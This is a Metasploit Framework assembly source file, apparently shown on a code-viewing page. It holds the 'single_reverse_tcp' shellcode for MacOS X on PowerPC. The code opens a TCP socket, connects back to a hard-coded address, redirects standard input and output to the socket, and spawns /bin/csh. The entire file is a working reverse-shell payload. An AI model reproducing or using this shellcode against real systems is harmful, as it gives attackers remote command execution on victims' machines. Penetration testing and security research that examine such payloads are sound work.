Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;;
2
;
3
;        Name: single_reverse_tcp
4
;   Qualities: Can Have Nulls
5
;   Platforms: MacOS X / PPC
6
;     Authors: H D Moore <hdm [at] metasploit.com>
7
;     Version: $Revision: 1612 $
8
;     License:
9
;
10
;        This file is part of the Metasploit Exploit Framework
11
;        and is subject to the same licenses and copyrights as
12
;        the rest of this package.
13
;
14
; Description:
15
;
16
;        Connect back and spawn a shell
17
;
18
;
19
;;
20

21
.globl _main
22
.text
23
_main:
24
	;; socket
25
	li      r3, 2
26
    li      r4, 1
27
    li      r5, 6
28
    li      r0, 97
29
    sc
30
    xor     r0, r0, r0
31
    mr      r30, r3
32

33
    bl		_connect
34
    .long 	0x00022211
35
    .long 	0x7f000001
36

37
_connect:
38
    mflr    r4
39
    li      r5, 0x10
40
    li      r0, 98
41
    mr      r3, r30
42
    sc
43
	xor.	r5, r5, r5
44

45
_setup_dup2:
46
	li      r5, 2
47

48
_dup2:
49
    li      r0, 90
50
    mr      r3, r30
51
    mr      r4, r5
52
    sc
53
    xor     r0, r0, r0
54
    subi    r5, r5, 1
55
    cmpwi   r5, -1
56
    bnel    _dup2
57

58
_fork:
59
    li      r0, 2
60
    sc
61
	xor.	r5, r5, r5
62

63
_execsh:
64
    xor.    r5, r5, r5
65
    bnel    _execsh
66
    mflr    r3
67
    addi    r3, r3, 28
68
    stw     r3, -8(r1)      ; argv[0] = path
69
    stw     r5, -4(r1)      ; argv[1] = NULL
70
    subi    r4, r1, 8       ; r4 = {path, 0}
71
    li      r0, 59
72
    sc                      ; execve(path, argv, NULL)
73

74
; csh removes the need for setuid()
75
path:
76
	.ascii  "/bin/csh"
77
	.long   0x00414243
78

79

80

81